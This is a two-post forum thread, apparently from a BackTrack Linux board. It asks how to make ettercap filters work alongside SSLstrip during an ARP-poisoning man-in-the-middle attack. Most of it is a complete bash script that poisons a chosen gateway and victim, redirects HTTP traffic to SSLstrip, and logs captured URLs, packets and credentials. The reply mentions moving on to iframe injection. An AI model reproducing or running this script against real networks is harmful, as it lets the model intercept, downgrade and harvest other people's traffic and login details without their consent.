Results 1 to 2 of 2

Thread: Routing ettercap traffic ipt_owner alternative?

  1. #1
    Just burned his ISO
    Join Date
    Sep 2010
    Posts
    5

    Default Routing ettercap traffic ipt_owner alternative?

    Hello,

    I've googled for days and haven't found a simple answer to my issue. I am trying to get ettercap filters to work along with SSLstrip while doing an arp poisoning MITM attack. I am able to get filters to work fine without SSLstrip but once I enable SSLstrip the filters stop working. I believe this is because the PREROUTING command used in most tutorials and scripts sends everything to sslstrip before ettercap is done with the packets. I believe an OUTPUT rule defined by guid would take care of the problem. However, BT4 R1 doesn't include the ipt_owner module.

    1) Is there an easy way to get the ipt_owner module working? I see a lot of posts telling people not to recompile.. and I've never done so before but I'm willing to play around since I have my USB persistent install cloned to another drive.

    2) is there an alternate method of routing only traffic originating from ettercap to sslstrip?
    I was thinking something along the lines of:


    Code:
    iptables -t nat -A OUTPUT -p tcp -m owner ! --uid-owner ettercap --dport
    80 -j REDIRECT --to-port 10000
    to replace:

    Code:
    iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
    Am I approaching this correctly? Is there another way to do it?


    Thanks for any advice and the great distro/resources here.

    Here is the full script.

    Code:
    #!/bin/bash
    # modified scripts found on backtrack-linux.org by killadninja, tedbear
    # Make sure /etc/etter.conf is commented out as such 
    # if you use iptables:
       #redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
       #redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
    
    echo -n "What interface to use? ie wlan0: "
    read -e IFACE
    echo -n "Name of "Session"? (name of the folder that will be created with all the log files): "
    read -e SESSION
    echo -n "Gateway IP - LEAVE BLANK IF YOU WANT TO ARP WHOLE NETWORK: "
    read -e ROUTER
    echo -n "Target IP - LEAVE BLANK IF YOU WANT TO ARP WHOLE NETWORK: "
    read -e VICTIM
    
    mkdir /root/$SESSION/
    
    # Setup network
    echo "[+] Setting up iptables"
    iptables --flush
    iptables --table nat --flush
    iptables --delete-chain
    iptables --table nat --delete-chain
    iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
    echo 1 > /proc/sys/net/ipv4/ip_forward
    sleep 1
    
    # Sslstrip
    echo "[+] Starting sslstrip..."
    #xterm -geometry 75x15+1+200 -T sslstrip -e sslstrip -f -a -k -w /root/$SESSION/$SESSION.log &
    sleep 2
    
    # urlsnarf
    echo "[+] Starting urlsnarf..."
    urlsnarf -i $IFACE | grep http > /root/$SESSION/$SESSION.txt &
    sleep 1 
    
    #arpspoof
    #echo "[+] Starting arpspoof..."
    #xterm -geometry 75x15+1+200 -T arpspoof -e arpspoof -i wlan0 -t 192.168.1.79 192.168.1.1 &
    #xterm -geometry 75x15+1+200 -T arpspoof -e arpspoof -i wlan0 -t 192.168.1.1 192.168.1.79 &
    
    # Ettercap
    echo
    echo "[+] Starting ettercap..."
    xterm -geometry 73x25+1+300 -T ettercap -s -sb -si +sk -sl 5000 -hold -e ettercap -Tq -F ig.ef -i $IFACE -w /root/$SESSION/$SESSION.pcap -L /root/$SESSION/$SESSION -P autoadd -M arp:remote /"$ROUTER"/ /"$VICTIM"/ &
    cat /proc/sys/net/ipv4/ip_forward
    iptables -t nat -L
    #auto add hosts append -P autoadd 
    sleep 1
    
    echo
    echo "[+] IMPORTANT..."
    echo "After you have finished please close mitmssl and clean up properly by hitting y,
    if mitmssl is not closed properly ERRORS WILL OCCUR "
    read WISH
    
    # Clean up
    if [ $WISH = "y" ] ; then
    echo
    echo "[+] Cleaning mitmssl and resetting iptables..."
    killall sslstrip
    killall ettercap
    killall python
    killall urlsnarf
    killall xterm
    echo "0" > /proc/sys/net/ipv4/ip_forward
    iptables --flush
    iptables --table nat --flush
    iptables --delete-chain
    iptables --table nat --delete-chain
    etterlog -p -i /root/$SESSION/$SESSION.eci
    
    echo "[+] Clean up successful..."
    echo "[+] Thank you for using mitmssl Good Bye..."
    exit
    
    fi 
    exit

  2. #2
    Junior Member
    Join Date
    Jan 2010
    Posts
    40

    Default Re: Routing ettercap traffic ipt_owner alternative?

    Thanks for the information. I could never get the ettercap filters to work at all, now at least I know its because of SSLStrip and I can go back to trying iframe injection and other goodies.
    Hope you find an answer to your question as it would be helpful to many others.

Similar Threads

  1. Problem when using ettercap filters to alter traffic
    By albanderuaz in forum Beginners Forum
    Replies: 6
    Last Post: 06-21-2010, 02:26 PM
  2. Replies: 8
    Last Post: 08-29-2008, 11:28 AM
  3. Replies: 18
    Last Post: 08-04-2008, 07:36 AM
  4. Ettercap traffic forwarding
    By chrisbdaemon in forum OLD BT3beta Bugs and Fixes
    Replies: 0
    Last Post: 12-22-2007, 02:12 AM
  5. ettercap and viewing poisoned arp re-routing?
    By bruk0ut in forum OLD BackTrack v2.0 Final
    Replies: 1
    Last Post: 11-19-2007, 09:10 PM

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •